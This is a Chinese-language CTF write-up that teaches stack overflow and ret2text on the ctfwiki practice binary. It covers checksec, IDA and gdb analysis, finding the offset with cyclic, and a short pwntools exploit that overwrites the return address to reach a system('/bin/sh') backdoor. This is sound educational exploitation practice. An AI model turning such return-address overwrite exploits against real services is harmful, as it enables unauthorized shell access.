<template><div><p><a name="4985b9c9"></a></p>
<h2 id="什么是栈溢出" tabindex="-1"><a class="header-anchor" href="#什么是栈溢出" aria-hidden="true">#</a> 什么是栈溢出：</h2>
<p>栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数，因而导致与其相邻的栈中的变量的值被改变（比如gets函数，他不会去验证你输入的值的长度，通过这个函数，你可以往一个本身大小为4字节的数组中填入任意大小的数据，如果填入8字节的数据，将会导致栈溢出，进而程序报错）。就像是往杯子里倒水，水满了溢出来最后烫到你一样。<br /><strong>最简单的栈溢出利用：ret2text</strong><br />通过栈溢出修改call指令保存在栈上的返回地址（eip的值），这样cpu执行ret指令的时候，就会将被修改的值从栈上取出放入eip寄存器中，紧接着执行eip所指向的位置的指令，这样就相当于控制了程序的执行流。</p>
<p><a name="1c7c1fdd"></a></p>
<h2 id="例题-ctfwiki-ret2text" tabindex="-1"><a class="header-anchor" href="#例题-ctfwiki-ret2text" aria-hidden="true">#</a> 例题：ctfwiki ret2text</h2>
<p><a name="e0958639"></a></p>
<h3 id="首先-cheaksec。" tabindex="-1"><a class="header-anchor" href="#首先-cheaksec。" aria-hidden="true">#</a> 首先，cheaksec。</h3>
<p><img src="https://img-blog.csdnimg.cn/20210221152436742.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTk0MzUyMg==,size_16,color_FFFFFF,t_70#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=Jqffs&amp;originHeight=207&amp;originWidth=939&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p>32位小端序程序。<br />开启了堆栈不可执行保护（NX），即不会把堆栈上的数据当成指令来执行。<br />没有canary保护，可以利用栈溢出来修改eip。<br />PIE地址随机化没有开启。</p>
<p><a name="394701f8"></a></p>
<h3 id="ida分析" tabindex="-1"><a class="header-anchor" href="#ida分析" aria-hidden="true">#</a> ida分析</h3>
<p>如果源码比较复杂，可以通过运行程序的方式来辅助理解程序。<br />main函数存在gets函数，即存在栈溢出漏洞。<br /><img src="https://img-blog.csdnimg.cn/20210221152459919.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTk0MzUyMg==,size_16,color_FFFFFF,t_70#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=i9CBu&amp;originHeight=243&amp;originWidth=671&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p>存在一个secure函数，函数内部调用了system（“/bin/sh”），即后门函数，程序中调用了该函数后可以获得一个shell。<br /><img src="https://img-blog.csdnimg.cn/2021022115252619.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTk0MzUyMg==,size_16,color_FFFFFF,t_70#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=bl7Fd&amp;originHeight=301&amp;originWidth=531&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p>在ida视图下，可以看到system函数地址为0x0804863A<br /><img src="https://img-blog.csdnimg.cn/20210221152547541.png#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=P6OOl&amp;originHeight=84&amp;originWidth=872&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p><strong>思路：首先通过栈溢出填充垃圾数据，覆盖到eip之前，再填入system函数地址，即可获得shell。</strong></p>
<p><a name="338d3986"></a></p>
<h3 id="如何确定栈溢出所需要的垃圾数据长度" tabindex="-1"><a class="header-anchor" href="#如何确定栈溢出所需要的垃圾数据长度" aria-hidden="true">#</a> 如何确定栈溢出所需要的垃圾数据长度？</h3>
<p><a name="695c4042"></a></p>
<h4 id="方式一-通过ida可以观察出来-但有时结果不太准确。" tabindex="-1"><a class="header-anchor" href="#方式一-通过ida可以观察出来-但有时结果不太准确。" aria-hidden="true">#</a> 方式一：通过ida可以观察出来，但有时结果不太准确。</h4>
<p><img src="https://img-blog.csdnimg.cn/20210221152612188.png#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=Aif7O&amp;originHeight=62&amp;originWidth=514&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p>上图显示0x64的大小即可覆盖到ebp，但却与动态调试的结果不同。（有时候动态调试结果也不太准确，一般以动态调试结果为准，也可以动态调试结果和ida结果分别尝试一次）</p>
<p><a name="dadfa31f"></a></p>
<h4 id="方式二-动态调试" tabindex="-1"><a class="header-anchor" href="#方式二-动态调试" aria-hidden="true">#</a> 方式二：动态调试</h4>
<p>在call函数处下断点，输入aaaa，<br /><img src="https://img-blog.csdnimg.cn/20210221152633913.png#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=TJAWb&amp;originHeight=97&amp;originWidth=509&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p><img src="https://img-blog.csdnimg.cn/20210221152656633.png#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=fUE7i&amp;originHeight=122&amp;originWidth=623&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p>aaaa所在的地址为0xffffd24c，ebp为 0xffffd2b8，相减得0x6c，即覆盖0x6c个垃圾数据“a”即可到达ebp的位置。<br /><img src="https://img-blog.csdnimg.cn/20210221152728416.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTk0MzUyMg==,size_16,color_FFFFFF,t_70#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=PNjWP&amp;originHeight=439&amp;originWidth=484&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p>此时再覆盖4字节的垃圾数据“b”（32位程序为4字节，64位程序为8字节）：<br /><img src="https://img-blog.csdnimg.cn/20210221152751179.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTk0MzUyMg==,size_16,color_FFFFFF,t_70#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=lYbtr&amp;originHeight=421&amp;originWidth=500&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p>此时如果再往里输入数据，就可以修改eip的值，我们此时输入system函数的地址，即可完成利用。<br />在上述过程中，我们向程序输入了（0x6c+4）的垃圾数据。</p>
<p><a name="dab1d734"></a></p>
<h5 id="手算比较麻烦-还有一种小工具cyclic" tabindex="-1"><a class="header-anchor" href="#手算比较麻烦-还有一种小工具cyclic" aria-hidden="true">#</a> 手算比较麻烦，还有一种小工具cyclic</h5>
<p>首先输入cyclic 200：<br /><img src="https://img-blog.csdnimg.cn/20210221152834173.png#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=GW55J&amp;originHeight=113&amp;originWidth=1335&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p>得到一组数据，将其复制下来，然后用gdb调试程序，输入r运行，运行之后将这段程序输入进去：<br /><img src="https://img-blog.csdnimg.cn/20210221152901923.png#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=s14eV&amp;originHeight=166&amp;originWidth=1336&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p>之后程序报错：<br /><img src="https://img-blog.csdnimg.cn/20210221152924308.png#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=couL6&amp;originHeight=114&amp;originWidth=722&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p>这说明我们输入的字符覆盖了eip，即字符“daab”，输入cyclic -l daab就能知道输入点到eip的距离，即【0x6c+4】的值：<br /><img src="https://img-blog.csdnimg.cn/20210221152949108.png#pic_center#crop=0&amp;crop=0&amp;crop=1&amp;crop=1&amp;id=GAGuW&amp;originHeight=95&amp;originWidth=319&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" loading="lazy"></p>
<p>exp：</p>
<div class="language-python ext-py line-numbers-mode"><pre v-pre class="language-python"><code><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>  <span class="token operator">//</span>引入pwntools模块
sh <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token string">'./ret2text'</span><span class="token punctuation">)</span><span class="token operator">//</span>包含本地程序
<span class="token comment">#sh = remote('6.6.6.6',888)//包含6.6.6.6服务器的888端口的程序</span>
target <span class="token operator">=</span> <span class="token number">0x804863a</span><span class="token operator">//</span>返回地址
sh<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'A'</span> <span class="token operator">*</span> <span class="token punctuation">(</span><span class="token number">0x6c</span> <span class="token operator">+</span> <span class="token number">4</span><span class="token punctuation">)</span> <span class="token operator">+</span> p32<span class="token punctuation">(</span>target<span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token operator">//</span>p32<span class="token punctuation">(</span><span class="token punctuation">)</span>表示将数据转换为<span class="token number">32</span>位系统下在内存中的存在方式
sh<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">//</span>接收交互结果
</code></pre><div class="line-numbers" aria-hidden="true"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div></div></template>


